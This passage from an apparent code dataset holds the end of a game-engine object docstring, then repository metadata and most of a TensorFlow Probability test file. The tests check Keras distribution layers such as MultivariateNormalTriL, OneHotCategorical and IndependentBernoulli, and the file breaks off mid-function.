     aliases - alias-handler: use aliases.add/remove/get() to use.
     permissions - permission-handler: use permissions.add/remove() to
                   add/remove new perms.
     locks - lock-handler: use locks.add() to add new lock strings
     scripts - script-handler. Add new scripts to object with scripts.add()
     cmdset - cmdset-handler. Use cmdset.add() to add new cmdsets to object
     nicks - nick-handler. New nicks with nicks.add().
     sessions - sessions-handler. Get Sessions connected to this
                object with sessions.get()
     attributes - attribute-handler. Use attributes.add/remove/get.
     db - attribute-handler: Shortcut for attribute-handler. Store/retrieve
            database attributes using self.db.myattr=val, val=self.db.myattr
     ndb - non-persistent attribute handler: same as db but does not create
            a database entry when storing data

    * Helper methods (see src.objects.objects.py for full headers)

     search(ostring, global_search=False, attribute_name=None,
             use_nicks=False, location=None, ignore_errors=False, account=False)
     execute_cmd(raw_string)
     msg(text=None, **kwargs)
     msg_contents(message, exclude=None, from_obj=None, **kwargs)
     move_to(destination, quiet=False, emit_to_obj=None, use_destination=True)
     copy(new_key=None)
     delete()
     is_typeclass(typeclass, exact=False)
     swap_typeclass(new_typeclass, clean_attributes=False, no_default=True)
     access(accessing_obj, access_type='read', default=False)
     check_permstring(permstring)

    * Hooks (these are class methods, so args should start with self):

     basetype_setup()     - only called once, used for behind-the-scenes
                            setup. Normally not modified.
     basetype_posthook_setup() - customization in basetype, after the object
                            has been created; Normally not modified.

     at_object_creation() - only called once, when object is first created.
                            Object customizations go here.
     at_object_delete() - called just before deleting an object. If returning
                            False, deletion is aborted. Note that all objects
                            inside a deleted object are automatically moved
                            to their <home>, they don't need to be removed here.

     at_init()            - called whenever typeclass is cached from memory,
                            at least once every server restart/reload
     at_cmdset_get(**kwargs) - this is called just before the command handler
                            requests a cmdset from this object. The kwargs are
                            not normally used unless the cmdset is created
                            dynamically (see e.g. Exits).
     at_pre_puppet(account)- (account-controlled objects only) called just
                            before puppeting
     at_post_puppet()     - (account-controlled objects only) called just
                            after completing connection account<->object
     at_pre_unpuppet()    - (account-controlled objects only) called just
                            before un-puppeting
     at_post_unpuppet(account) - (account-controlled objects only) called just
                            after disconnecting account<->object link
     at_server_reload()   - called before server is reloaded
     at_server_shutdown() - called just before server is fully shut down

     at_access(result, accessing_obj, access_type) - called with the result
                            of a lock access check on this object. Return value
                            does not affect check result.

     at_pre_move(destination)             - called just before moving object
                        to the destination. If returns False, move is cancelled.
     announce_move_from(destination)         - called in old location, just
                        before move, if obj.move_to() has quiet=False
     announce_move_to(source_location)       - called in new location, just
                        after move, if obj.move_to() has quiet=False
     at_post_move(source_location)          - always called after a move has
                        been successfully performed.
     at_object_leave(obj, target_location)   - called when an object leaves
                        this object in any fashion
     at_object_receive(obj, source_location) - called when this object receives
                        another object

     at_traverse(traversing_object, source_loc) - (exit-objects only)
                              handles all moving across the exit, including
                              calling the other exit hooks. Use super() to retain
                              the default functionality.
     at_post_traverse(traversing_object, source_location) - (exit-objects only)
                              called just after a traversal has happened.
     at_failed_traverse(traversing_object)      - (exit-objects only) called if
                       traversal fails and property err_traverse is not defined.

     at_msg_receive(self, msg, from_obj=None, **kwargs) - called when a message
                             (via self.msg()) is sent to this obj.
                             If returns false, aborts send.
     at_msg_send(self, msg, to_obj=None, **kwargs) - called when this objects
                             sends a message to someone via self.msg().

     return_appearance(looker) - describes this object. Used by "look"
                                 command by default
     at_desc(looker=None)      - called by 'look' whenever the
                                 appearance is requested.
     at_get(getter)            - called after object has been picked up.
                                 Does not stop pickup.
     at_drop(dropper)          - called when this object has been dropped.
     at_say(speaker, message)  - by default, called if an object inside this
                                 object speaks
    """

    # Intentionally empty: all behavior is inherited from DefaultObject;
    # override the hooks documented above to customize.
    pass
pass
| 51.809816 | 81 | 0.639905 |
cf0c13eaf7220159354fd2d3139757ba99be5317 | 42,693 | py | Python | tensorflow_probability/python/layers/distribution_layer_test.py | ykkawana/probability | 65bfd91cf6e855674da8dd9976c067f79da46e90 | [
"Apache-2.0"
] | 1 | 2018-08-27T14:37:40.000Z | 2018-08-27T14:37:40.000Z | tensorflow_probability/python/layers/distribution_layer_test.py | ykkawana/probability | 65bfd91cf6e855674da8dd9976c067f79da46e90 | [
"Apache-2.0"
] | null | null | null | tensorflow_probability/python/layers/distribution_layer_test.py | ykkawana/probability | 65bfd91cf6e855674da8dd9976c067f79da46e90 | [
"Apache-2.0"
] | 1 | 2018-08-27T14:37:44.000Z | 2018-08-27T14:37:44.000Z | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
# Dependency imports
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import
tfk = tf.keras
tfkl = tf.keras.layers
tfb = tfp.bijectors
tfd = tfp.distributions
tfpl = tfp.layers
def _logit_avg_expit(t):
  """Computes `logit(mean(expit(t)))` in a numerically stable manner."""
  num_draws = tf.cast(tf.shape(input=t)[0], t.dtype)
  # log(mean(sigmoid(t))) over axis 0, via logsumexp of log-sigmoid terms.
  log_avg_prob = (
      tf.reduce_logsumexp(input_tensor=-tf.nn.softplus(-t), axis=0) -
      tf.math.log(num_draws))
  # logit(p) = log(p) - log1p(-p).
  return log_avg_prob - tf.math.log1p(-tf.exp(log_avg_prob))
def _vec_pad(x, value=0):
  """Prepends a column of `value` (default 0) along the last axis."""
  # Pad nothing on every axis except the last, which gets one leading entry.
  inner_rank = tf.rank(x) - 1
  pad_spec = tf.concat(
      [tf.zeros([inner_rank, 2], dtype=tf.int32), [[1, 0]]], axis=0)
  return tf.pad(tensor=x, paddings=pad_spec, constant_values=value)
@test_util.run_all_in_graph_and_eager_modes
class EndToEndTest(tf.test.TestCase):
  """Test tfp.layers work in all three Keras APIs.

  For end-to-end tests we fit a Variational Autoencoder (VAE) because this
  requires chaining two Keras models, an encoder and decoder. Chaining two
  models is important because making a `Distribution` as output by a Keras model
  the input of another Keras model--and concurrently fitting both--is the
  primary value-add of using the `tfp.layers.DistributionLambda`. Otherwise,
  under many circumstances you can directly return a Distribution from a Keras
  layer, as long as the Distribution base class has a tensor conversion function
  registered via `tf.register_tensor_conversion_function`.

  Fundamentally, there are three ways to be Keras models:

  1. `tf.keras.Sequential`
  2. Functional API
  3. Subclass `tf.keras.Model`.

  It's important to have end-to-end tests for all three, because #1 and #2 call
  `__call__` and `call` differently. (#3's call pattern depends on user
  implementation details, but in general ends up being either #1 or #2.)
  """

  def setUp(self):
    # Small synthetic dataset: uniform [0, 1) "images" of shape `input_shape`,
    # encoded down to `encoded_size` latent dimensions.
    self.encoded_size = 2
    self.input_shape = [2, 2, 1]
    self.train_size = 100
    self.test_size = 100
    self.x = np.random.rand(
        self.train_size, *self.input_shape).astype(np.float32)
    self.x_test = np.random.rand(
        self.test_size, *self.input_shape).astype(np.float32)

  # TODO(b/120307671): Once this bug is resolved, use
  # `activity_regularizer=tfpl.KLDivergenceRegularizer` instead of
  # `KLDivergenceAddLoss`.

  def test_keras_sequential_api(self):
    """Test `DistributionLambda`s are composable via Keras `Sequential` API."""
    encoder_model = tfk.Sequential([
        tfkl.InputLayer(input_shape=self.input_shape),
        tfkl.Flatten(),
        tfkl.Dense(10, activation='relu'),
        tfkl.Dense(tfpl.MultivariateNormalTriL.params_size(self.encoded_size)),
        tfpl.MultivariateNormalTriL(self.encoded_size),
        tfpl.KLDivergenceAddLoss(
            tfd.Independent(tfd.Normal(loc=[0., 0], scale=1),
                            reinterpreted_batch_ndims=1),
            weight=self.train_size),
    ])

    decoder_model = tfk.Sequential([
        tfkl.InputLayer(input_shape=[self.encoded_size]),
        tfkl.Dense(10, activation='relu'),
        tfkl.Dense(tfpl.IndependentBernoulli.params_size(self.input_shape)),
        tfpl.IndependentBernoulli(self.input_shape, tfd.Bernoulli.logits),
    ])

    vae_model = tfk.Model(
        inputs=encoder_model.inputs,
        outputs=decoder_model(encoder_model.outputs[0]))
    vae_model.compile(
        optimizer=tf.compat.v1.train.AdamOptimizer(),
        loss=lambda x, rv_x: -rv_x.log_prob(x),
        metrics=[])
    vae_model.fit(self.x, self.x,
                  batch_size=25,
                  epochs=1,
                  verbose=True,
                  validation_data=(self.x_test, self.x_test),
                  shuffle=True)
    yhat = vae_model(tf.convert_to_tensor(value=self.x_test))
    self.assertIsInstance(yhat, tfd.Independent)
    self.assertIsInstance(yhat.distribution, tfd.Bernoulli)

  def test_keras_functional_api(self):
    """Test `DistributionLambda`s are composable via Keras functional API."""
    encoder_model = [
        tfkl.Flatten(),
        tfkl.Dense(10, activation='relu'),
        tfkl.Dense(tfpl.MultivariateNormalTriL.params_size(
            self.encoded_size)),
        tfpl.MultivariateNormalTriL(self.encoded_size),
        tfpl.KLDivergenceAddLoss(
            tfd.Independent(tfd.Normal(loc=[0., 0], scale=1),
                            reinterpreted_batch_ndims=1),
            weight=self.train_size),
    ]

    decoder_model = [
        tfkl.Dense(10, activation='relu'),
        tfkl.Dense(tfpl.IndependentBernoulli.params_size(self.input_shape)),
        tfpl.IndependentBernoulli(self.input_shape, tfd.Bernoulli.logits),
    ]

    images = tfkl.Input(shape=self.input_shape)
    # Thread the input through each layer list in order.
    encoded = functools.reduce(lambda x, f: f(x), encoder_model, images)
    decoded = functools.reduce(lambda x, f: f(x), decoder_model, encoded)

    vae_model = tfk.Model(inputs=images, outputs=decoded)
    vae_model.compile(
        optimizer=tf.compat.v1.train.AdamOptimizer(),
        loss=lambda x, rv_x: -rv_x.log_prob(x),
        metrics=[])
    vae_model.fit(self.x, self.x,
                  batch_size=25,
                  epochs=1,
                  verbose=True,
                  validation_data=(self.x_test, self.x_test),
                  shuffle=True)
    yhat = vae_model(tf.convert_to_tensor(value=self.x_test))
    self.assertIsInstance(yhat, tfd.Independent)
    self.assertIsInstance(yhat.distribution, tfd.Bernoulli)

  def test_keras_model_api(self):
    """Test `DistributionLambda`s are composable via Keras `Model` API."""

    class Encoder(tfk.Model):
      """Encoder."""

      def __init__(self, input_shape, encoded_size, train_size):
        super(Encoder, self).__init__()
        self._layers = [
            tfkl.Flatten(),
            tfkl.Dense(10, activation='relu'),
            tfkl.Dense(tfpl.MultivariateNormalTriL.params_size(encoded_size)),
            tfpl.MultivariateNormalTriL(encoded_size),
            tfpl.KLDivergenceAddLoss(
                tfd.Independent(tfd.Normal(loc=tf.zeros(encoded_size), scale=1),
                                reinterpreted_batch_ndims=1),
                weight=train_size),
        ]

      def call(self, inputs):
        return functools.reduce(lambda x, f: f(x), self._layers, inputs)

    class Decoder(tfk.Model):
      """Decoder."""

      def __init__(self, output_shape):
        super(Decoder, self).__init__()
        self._layers = [
            tfkl.Dense(10, activation='relu'),
            tfkl.Dense(tfpl.IndependentBernoulli.params_size(output_shape)),
            tfpl.IndependentBernoulli(output_shape, tfd.Bernoulli.logits),
        ]

      def call(self, inputs):
        return functools.reduce(lambda x, f: f(x), self._layers, inputs)

    encoder = Encoder(self.input_shape, self.encoded_size, self.train_size)
    decoder = Decoder(self.input_shape)

    images = tfkl.Input(shape=self.input_shape)
    encoded = encoder(images)
    decoded = decoder(encoded)

    vae_model = tfk.Model(inputs=images, outputs=decoded)
    vae_model.compile(
        optimizer=tf.compat.v1.train.AdamOptimizer(),
        loss=lambda x, rv_x: -rv_x.log_prob(x),
        metrics=[])
    vae_model.fit(self.x, self.x,
                  batch_size=25,
                  epochs=1,
                  validation_data=(self.x_test, self.x_test))
    yhat = vae_model(tf.convert_to_tensor(value=self.x_test))
    self.assertIsInstance(yhat, tfd.Independent)
    self.assertIsInstance(yhat.distribution, tfd.Bernoulli)

  def test_keras_sequential_api_multiple_draws(self):
    # Same as test_keras_sequential_api but the encoder emits `num_draws`
    # samples per input, which the decoder averages back together.
    num_draws = 2

    encoder_model = tfk.Sequential([
        tfkl.InputLayer(input_shape=self.input_shape),
        tfkl.Flatten(),
        tfkl.Dense(10, activation='relu'),
        tfkl.Dense(tfpl.MultivariateNormalTriL.params_size(self.encoded_size)),
        tfpl.MultivariateNormalTriL(self.encoded_size,
                                    lambda s: s.sample(num_draws, seed=42)),
        tfpl.KLDivergenceAddLoss(
            # TODO(b/119756336): Due to eager/graph Jacobian graph caching bug
            # we add here the capability for deferred construction of the prior.
            lambda: tfd.MultivariateNormalDiag(loc=tf.zeros(self.encoded_size)),
            weight=self.train_size),
    ])

    decoder_model = tfk.Sequential([
        tfkl.InputLayer(input_shape=[self.encoded_size]),
        tfkl.Dense(10, activation='relu'),
        tfkl.Dense(tfpl.IndependentBernoulli.params_size(
            self.input_shape)),
        tfkl.Lambda(_logit_avg_expit),  # Same as averaging the Bernoullis.
        tfpl.IndependentBernoulli(self.input_shape, tfd.Bernoulli.logits),
    ])

    vae_model = tfk.Model(
        inputs=encoder_model.inputs,
        outputs=decoder_model(encoder_model.outputs[0]))
    vae_model.compile(
        optimizer=tf.compat.v1.train.AdamOptimizer(),
        loss=lambda x, rv_x: -rv_x.log_prob(x),
        metrics=[])
    vae_model.fit(self.x, self.x,
                  batch_size=25,
                  epochs=1,
                  steps_per_epoch=1,  # Usually `n // batch_size`.
                  validation_data=(self.x_test, self.x_test))
    yhat = vae_model(tf.convert_to_tensor(value=self.x_test))
    self.assertIsInstance(yhat, tfd.Independent)
    self.assertIsInstance(yhat.distribution, tfd.Bernoulli)
@test_util.run_all_in_graph_and_eager_modes
class KLDivergenceAddLoss(tf.test.TestCase):
  # NOTE(review): unlike the sibling classes, this name lacks the `Test`
  # suffix convention; presumably still discovered since it subclasses
  # tf.test.TestCase -- consider renaming to KLDivergenceAddLossTest.

  def test_approx_kl(self):
    # TODO(b/120320323): Enable this test in eager.
    if tf.executing_eagerly(): return

    event_size = 2

    prior = tfd.MultivariateNormalDiag(loc=tf.zeros(event_size))
    model = tfk.Sequential([
        tfpl.MultivariateNormalTriL(event_size,
                                    lambda s: s.sample(int(1e3), seed=42)),
        tfpl.KLDivergenceAddLoss(prior, test_points_reduce_axis=0),
    ])

    loc = [-1., 1.]
    scale_tril = [[1.1, 0.],
                  [0.2, 1.3]]
    actual_kl = tfd.kl_divergence(
        tfd.MultivariateNormalTriL(loc, scale_tril), prior)

    # Build the flat parameter vector the layer consumes: loc followed by
    # the unconstrained (inverse ScaleTriL) scale parameters.
    x = tf.concat(
        [loc, tfb.ScaleTriL().inverse(scale_tril)], axis=0)[tf.newaxis]
    # Each call through the model appends one KL penalty to `model.losses`.
    y = model(x)
    self.assertEqual(1, len(model.losses))
    y = model(x)
    self.assertEqual(2, len(model.losses))

    [loc_, scale_tril_, actual_kl_, approx_kl_] = self.evaluate([
        y.loc, y.scale.to_dense(), actual_kl, model.losses[0]])
    self.assertAllClose([loc], loc_, atol=0., rtol=1e-5)
    self.assertAllClose([scale_tril], scale_tril_, atol=0., rtol=1e-5)
    # The Monte Carlo KL estimate should be near the analytic KL.
    self.assertNear(actual_kl_, approx_kl_, err=0.15)

    model.compile(
        optimizer=tf.compat.v1.train.AdamOptimizer(),
        loss=lambda x, dist: -dist.log_prob(x[0, :event_size]),
        metrics=[])
    model.fit(x, x,
              batch_size=25,
              epochs=1,
              steps_per_epoch=1)  # Usually `n // batch_size`.
@test_util.run_all_in_graph_and_eager_modes
class MultivariateNormalTriLTest(tf.test.TestCase):
  """Tests for `tfpl.MultivariateNormalTriL`."""

  def _check_distribution(self, t, x):
    # Verify `x` round-trips back to the raw parameter vector `t`.
    self.assertIsInstance(x, tfd.MultivariateNormalTriL)
    t_back = tf.concat([
        x.loc, tfb.ScaleTriL().inverse(x.scale.to_dense())], axis=-1)
    self.assertAllClose(*self.evaluate([t, t_back]), atol=1e-6, rtol=1e-5)

  def test_new(self):
    d = 4
    p = tfpl.MultivariateNormalTriL.params_size(d)
    t = tfd.Normal(0, 1).sample([2, 3, p], seed=42)
    x = tfpl.MultivariateNormalTriL.new(t, d, validate_args=True)
    self._check_distribution(t, x)

  def test_layer(self):
    d = 4
    p = tfpl.MultivariateNormalTriL.params_size(d)
    layer = tfpl.MultivariateNormalTriL(d, tfd.Distribution.mean)
    t = tfd.Normal(0, 1).sample([2, 3, p], seed=42)
    x = layer(t)
    self._check_distribution(t, x)

  def test_doc_string(self):
    # Load data.
    n = int(1e3)
    scale_tril = np.array([[1.6180, 0.],
                           [-2.7183, 3.1416]]).astype(np.float32)
    scale_noise = 0.01
    x = self.evaluate(tfd.Normal(loc=0, scale=1).sample([n, 2]))
    eps = tfd.Normal(loc=0, scale=scale_noise).sample([n, 2])
    y = self.evaluate(tf.matmul(x, scale_tril) + eps)
    d = y.shape[-1]

    # To save testing time, let's encode the answer (i.e., _cheat_). Note: in
    # writing this test we verified the correct answer is achieved with random
    # initialization.
    true_kernel = np.pad(scale_tril, [[0, 0], [0, 3]], 'constant')
    true_bias = np.array([0, 0, np.log(scale_noise), 0, np.log(scale_noise)])

    # Create model.
    model = tf.keras.Sequential([
        tf.keras.layers.Dense(
            tfpl.MultivariateNormalTriL.params_size(d),
            kernel_initializer=lambda s, **_: true_kernel,
            bias_initializer=lambda s, **_: true_bias),
        tfpl.MultivariateNormalTriL(d),
    ])

    # Fit.
    model.compile(
        optimizer=tf.compat.v1.train.AdamOptimizer(),
        loss=lambda y, model: -model.log_prob(y),
        metrics=[])
    batch_size = 100
    model.fit(x, y,
              batch_size=batch_size,
              epochs=1,  # One ping only.
              steps_per_epoch=n // batch_size)
    # Weights should stay near the (pre-seeded) true values after one epoch.
    self.assertAllClose(true_kernel, model.get_weights()[0],
                        atol=1e-2, rtol=1e-3)
    self.assertAllClose(true_bias, model.get_weights()[1],
                        atol=1e-2, rtol=1e-3)
@test_util.run_all_in_graph_and_eager_modes
class OneHotCategoricalTest(tf.test.TestCase):
  """Tests for `tfpl.OneHotCategorical`."""

  def _check_distribution(self, t, x):
    # The raw parameters should pass through as logits unchanged.
    self.assertIsInstance(x, tfd.OneHotCategorical)
    [t_, x_logits_, x_probs_, mean_] = self.evaluate([
        t, x.logits, x.probs, x.mean()])
    self.assertAllClose(t_, x_logits_, atol=1e-6, rtol=1e-5)
    self.assertAllClose(x_probs_, mean_, atol=1e-6, rtol=1e-5)

  def test_new(self):
    d = 4
    p = tfpl.OneHotCategorical.params_size(d)
    t = tfd.Normal(0, 1).sample([2, 3, p], seed=42)
    x = tfpl.OneHotCategorical.new(t, d, validate_args=True)
    self._check_distribution(t, x)

  def test_layer(self):
    d = 4
    p = tfpl.OneHotCategorical.params_size(d)
    layer = tfpl.OneHotCategorical(d, validate_args=True)
    t = tfd.Normal(0, 1).sample([2, 3, p], seed=42)
    x = layer(t)
    self._check_distribution(t, x)

  def test_doc_string(self):
    # Load data.
    n = int(1e4)
    scale_noise = 0.01
    x = self.evaluate(tfd.Normal(loc=0, scale=1).sample([n, 2]))
    eps = tfd.Normal(loc=0, scale=scale_noise).sample([n, 1])
    y = self.evaluate(tfd.OneHotCategorical(
        logits=_vec_pad(
            0.3142 + 1.6180 * x[..., :1] - 2.7183 * x[..., 1:] + eps),
        dtype=tf.float32).sample())
    d = y.shape[-1]

    # Create model. The first logit is pinned to zero (via _vec_pad) so the
    # remaining logits are identified.
    model = tf.keras.Sequential([
        tf.keras.layers.Dense(tfpl.OneHotCategorical.params_size(d) - 1),
        tf.keras.layers.Lambda(_vec_pad),
        tfpl.OneHotCategorical(d),
    ])

    # Fit.
    model.compile(
        optimizer=tf.compat.v1.train.AdamOptimizer(learning_rate=0.5),
        loss=lambda y, model: -model.log_prob(y),
        metrics=[])
    batch_size = 100
    model.fit(x, y,
              batch_size=batch_size,
              epochs=1,
              steps_per_epoch=n // batch_size,
              shuffle=True)
    self.assertAllClose([[1.6180], [-2.7183]], model.get_weights()[0],
                        atol=0, rtol=0.1)
@test_util.run_all_in_graph_and_eager_modes
class CategoricalMixtureOfOneHotCategoricalTest(tf.test.TestCase):
  """Tests for `tfpl.CategoricalMixtureOfOneHotCategorical`."""

  def _check_distribution(self, t, x):
    self.assertIsInstance(x, tfd.MixtureSameFamily)
    self.assertIsInstance(x.mixture_distribution, tfd.Categorical)
    self.assertIsInstance(x.components_distribution, tfd.OneHotCategorical)
    # Reassemble the raw parameter vector: mixture logits followed by the
    # flattened per-component logits.
    t_back = tf.concat([
        x.mixture_distribution.logits,
        tf.reshape(x.components_distribution.logits, shape=[2, 3, -1]),
    ], axis=-1)
    [
        t_,
        t_back_,
        x_mean_,
        x_log_mean_,
        sample_mean_,
    ] = self.evaluate([
        t,
        t_back,
        x.mean(),
        x.log_mean(),
        tf.reduce_mean(input_tensor=x.sample(int(10e3), seed=42), axis=0),
    ])
    self.assertAllClose(t_, t_back_, atol=1e-6, rtol=1e-5)
    self.assertAllClose(x_mean_, np.exp(x_log_mean_), atol=1e-6, rtol=1e-5)
    # Monte Carlo check: the sample average should approximate the mean.
    self.assertAllClose(sample_mean_, x_mean_, atol=1e-3, rtol=0.1)

  def test_new(self):
    k = 2  # num components
    d = 4  # event size
    p = tfpl.CategoricalMixtureOfOneHotCategorical.params_size(d, k)
    t = tfd.Normal(0, 1).sample([2, 3, p], seed=42)
    x = tfpl.CategoricalMixtureOfOneHotCategorical.new(
        t, d, k, validate_args=True)
    self._check_distribution(t, x)

  def test_layer(self):
    k = 2  # num components
    d = 4  # event size
    p = tfpl.CategoricalMixtureOfOneHotCategorical.params_size(d, k)
    layer = tfpl.CategoricalMixtureOfOneHotCategorical(
        d, k, validate_args=True)
    t = tfd.Normal(0, 1).sample([2, 3, p], seed=42)
    x = layer(t)
    self._check_distribution(t, x)

  def test_doc_string(self):
    # Load data.
    n = int(1e3)
    scale_noise = 0.01
    x = self.evaluate(tfd.Normal(loc=0, scale=1).sample([n, 2]))
    eps = tfd.Normal(loc=0, scale=scale_noise).sample([n, 1])
    y = self.evaluate(tfd.OneHotCategorical(
        logits=_vec_pad(
            0.3142 + 1.6180 * x[..., :1] - 2.7183 * x[..., 1:] + eps),
        dtype=tf.float32).sample())
    d = y.shape[-1]

    # Create model.
    k = 2
    p = tfpl.CategoricalMixtureOfOneHotCategorical.params_size(d, k)
    model = tf.keras.Sequential([
        tf.keras.layers.Dense(p),
        tfpl.CategoricalMixtureOfOneHotCategorical(d, k),
    ])

    # Fit.
    model.compile(
        optimizer=tf.compat.v1.train.AdamOptimizer(learning_rate=0.5),
        loss=lambda y, model: -model.log_prob(y),
        metrics=[])
    batch_size = 100
    model.fit(x, y,
              batch_size=batch_size,
              epochs=1,
              steps_per_epoch=1,  # Usually `n // batch_size`.
              shuffle=True)
    yhat = model(x)
    self.assertIsInstance(yhat, tfd.MixtureSameFamily)
    self.assertIsInstance(yhat.mixture_distribution, tfd.Categorical)
    self.assertIsInstance(yhat.components_distribution, tfd.OneHotCategorical)
    # TODO(b/120221303): For now we just check that the code executes and we get
    # back a distribution instance. Better would be to change the data
    # generation so the model becomes well-specified (and we can check correctly
    # fitted params). However, not doing this test is not critical since all
    # components are unit-tested. (Ie, what we really want here--but don't
    # strictly need--is another end-to-end test.)
@test_util.run_all_in_graph_and_eager_modes
class _IndependentLayerTest(object):
  """Base class for testing independent distribution layers.

  Instances of subclasses must set:
    self.layer_class: The independent distribution layer class.
    self.dist_class: The underlying `tfd.Distribution` class.
    self.dtype: The data type for the parameters passed to the layer.
    self.use_static_shape: Whether or not test tensor inputs should have
      statically-known shapes.
  """

  def _distribution_to_params(self, distribution, batch_shape):
    """Given a self.layer_class instance, return a tensor of its parameters."""
    raise NotImplementedError

  def _build_tensor(self, ndarray, dtype=None):
    # Enforce parameterized dtype and static/dynamic testing.
    ndarray = np.asarray(ndarray).astype(
        dtype if dtype is not None else self.dtype)
    return tf.compat.v1.placeholder_with_default(
        input=ndarray, shape=ndarray.shape if self.use_static_shape else None)

  def _check_distribution(self, t, x, batch_shape):
    # Verify the layer built an Independent-wrapped `dist_class` whose
    # parameters round-trip back to the raw vector `t`.
    self.assertIsInstance(x, tfd.Independent)
    self.assertIsInstance(x.distribution, self.dist_class)
    t_back = self._distribution_to_params(x.distribution, batch_shape)
    [t_, t_back_] = self.evaluate([t, t_back])
    self.assertAllClose(t_, t_back_, atol=1e-6, rtol=1e-5)

  def test_new(self):
    batch_shape = self._build_tensor([2], dtype=np.int32)
    event_shape = self._build_tensor([2, 1, 2], dtype=np.int32)
    p = self.layer_class.params_size(event_shape)

    low = self._build_tensor(-3.)
    high = self._build_tensor(3.)
    t = tfd.Uniform(low, high).sample(tf.concat([batch_shape, [p]], 0), seed=42)

    x = self.layer_class.new(t, event_shape, validate_args=True)
    self._check_distribution(t, x, batch_shape)

  def test_layer(self):
    batch_shape = self._build_tensor([5, 5], dtype=np.int32)
    # Default (scalar) event shape.
    p = self.layer_class.params_size()

    low = self._build_tensor(-3.)
    high = self._build_tensor(3.)
    t = tfd.Uniform(low, high).sample(tf.concat([batch_shape, [p]], 0), seed=42)

    layer = self.layer_class(validate_args=True)
    x = layer(t)
    self._check_distribution(t, x, batch_shape)
@test_util.run_all_in_graph_and_eager_modes
class _IndependentBernoulliTest(_IndependentLayerTest):
  """Configures `_IndependentLayerTest` for `tfpl.IndependentBernoulli`."""

  layer_class = tfpl.IndependentBernoulli
  dist_class = tfd.Bernoulli

  def _distribution_to_params(self, distribution, batch_shape):
    # Flatten all event dims of the logits into one trailing axis.
    flat_shape = tf.concat([batch_shape, [-1]], axis=-1)
    return tf.reshape(distribution.logits, flat_shape)
@test_util.run_all_in_graph_and_eager_modes
class IndependentBernoulliTestDynamicShape(tf.test.TestCase,
                                           _IndependentBernoulliTest):
  # Run the shared Bernoulli tests with float64 inputs and dynamic shapes.
  dtype = np.float64
  use_static_shape = False
@test_util.run_all_in_graph_and_eager_modes
class IndependentBernoulliTestStaticShape(tf.test.TestCase,
                                          _IndependentBernoulliTest):
  # Run the shared Bernoulli tests with float32 inputs and static shapes.
  dtype = np.float32
  use_static_shape = True

  def test_doc_string(self):
    """End-to-end Keras fit recovering known generating parameters."""
    # Load data: y ~ Bernoulli(logits = x @ scale_tril + small noise).
    n = int(1e4)
    scale_tril = np.array([[1.6180, 0.],
                           [-2.7183, 3.1416]]).astype(np.float32)
    scale_noise = 0.01
    x = self.evaluate(tfd.Normal(loc=0, scale=1).sample([n, 2]))
    eps = tfd.Normal(loc=0, scale=scale_noise).sample([n, 2])
    y = self.evaluate(tfd.Bernoulli(
        logits=tf.reshape(tf.matmul(x, scale_tril) + eps,
                          shape=[n, 1, 2, 1])).sample())
    event_shape = y.shape[1:]

    # Create model.
    model = tf.keras.Sequential([
        tf.keras.layers.Dense(
            tfpl.IndependentBernoulli.params_size(event_shape)),
        tfpl.IndependentBernoulli(event_shape),
    ])

    # Fit with the negative log-likelihood of the predicted distribution.
    model.compile(
        optimizer=tf.compat.v1.train.AdamOptimizer(learning_rate=0.5),
        loss=lambda y, model: -model.log_prob(y),
        metrics=[])
    batch_size = 100
    model.fit(x, y,
              batch_size=batch_size,
              epochs=1,
              steps_per_epoch=n // batch_size,
              shuffle=True)
    # The fitted Dense kernel/bias should approximately recover the
    # generating parameters (scale_tril and zero bias) at loose tolerances.
    self.assertAllClose(scale_tril, model.get_weights()[0],
                        atol=0.15, rtol=0.15)
    self.assertAllClose([0., 0.], model.get_weights()[1],
                        atol=0.15, rtol=0.15)
@test_util.run_all_in_graph_and_eager_modes
class _IndependentLogisticTest(_IndependentLayerTest):
  """Shared IndependentLayer tests specialized to `tfpl.IndependentLogistic`."""
  layer_class = tfpl.IndependentLogistic
  dist_class = tfd.Logistic

  def _distribution_to_params(self, distribution, batch_shape):
    # Invert the layer's parameterization: flattened locs followed by the
    # softplus-inverse of the scales, concatenated on the last axis.
    return tf.concat([
        tf.reshape(distribution.loc, tf.concat([batch_shape, [-1]], axis=-1)),
        tfd.softplus_inverse(tf.reshape(
            distribution.scale, tf.concat([batch_shape, [-1]], axis=-1)))
    ], -1)
@test_util.run_all_in_graph_and_eager_modes
class IndependentLogisticTestDynamicShape(tf.test.TestCase,
                                          _IndependentLogisticTest):
  # Run the shared Logistic tests with float32 inputs and dynamic shapes.
  dtype = np.float32
  use_static_shape = False
@test_util.run_all_in_graph_and_eager_modes
class IndependentLogisticTestStaticShape(tf.test.TestCase,
                                         _IndependentLogisticTest):
  # Run the shared Logistic tests with float64 inputs and static shapes.
  dtype = np.float64
  use_static_shape = True

  def test_doc_string(self):
    """Doc-string example: a tiny encoder ending in IndependentLogistic."""
    input_shape = [28, 28, 1]
    encoded_shape = 2
    encoder = tfk.Sequential([
        tfkl.InputLayer(input_shape=input_shape, dtype=self.dtype),
        tfkl.Flatten(),
        tfkl.Dense(10, activation='relu'),
        tfkl.Dense(tfpl.IndependentLogistic.params_size(encoded_shape)),
        tfpl.IndependentLogistic(encoded_shape),
        tfkl.Lambda(lambda x: x + 0.)  # To force conversion to tensor.
    ])

    # Test that we can run the model and get a sample.
    x = np.random.randn(*([1] + input_shape)).astype(self.dtype)
    self.assertEqual((1, 2), encoder.predict_on_batch(x).shape)

    out = encoder(tf.convert_to_tensor(value=x))
    self.assertEqual((1, 2), out.shape)
    self.assertEqual((1, 2), self.evaluate(out).shape)
@test_util.run_all_in_graph_and_eager_modes
class _IndependentNormalTest(_IndependentLayerTest):
  """Shared IndependentLayer tests specialized to `tfpl.IndependentNormal`."""
  layer_class = tfpl.IndependentNormal
  dist_class = tfd.Normal

  def _distribution_to_params(self, distribution, batch_shape):
    # Invert the layer's parameterization: flattened locs followed by the
    # softplus-inverse of the scales, concatenated on the last axis.
    return tf.concat([
